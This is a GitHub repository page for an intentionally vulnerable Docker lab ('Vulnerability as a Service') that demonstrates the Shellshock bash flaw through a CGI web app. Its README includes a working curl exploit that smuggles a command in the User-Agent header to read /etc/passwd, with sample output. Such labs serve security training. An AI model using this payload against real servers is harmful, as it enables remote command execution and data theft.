Skip to content
Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Dockerfile Minor changes Jul 12, 2015
LICENSE.md Create LICENSE.md Jul 11, 2015
README.md Edited syntax highlighting Aug 4, 2015
index.html Minor changes Jul 12, 2015
stats Added Docker files Jul 11, 2015

README.md

Vulnerability as a Service - CVE 2014-6271

A Debian (Wheezy) Linux system with a vulnerable version of bash and a web application to showcase CVS-2014-6271, a.k.a. Shellshock.

Overview

This docker container is based on Debian Wheezy and has been modified to use a vulernable version of Bash (bash_4.2:2b:dfsg-0.1).

A web application is available via Apache 2 and serves a CGI script which runs shell commands.

Usage

Install the container with docker pull hmlio/vaas-cve-2014-6271

Run the container with a port mapping docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271

You should be able to access the web application at http://your-ip:8080/.

Exploitation

The web application/vulnerable bash version can be exploited as shown below:

# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Credits

The concept and the web application are heavily inspired by the VulnHub VM "Sokar", created by rasta_mouse. For further details please see https://www.vulnhub.com/entry/sokar-1,113/.

You can’t perform that action at this time.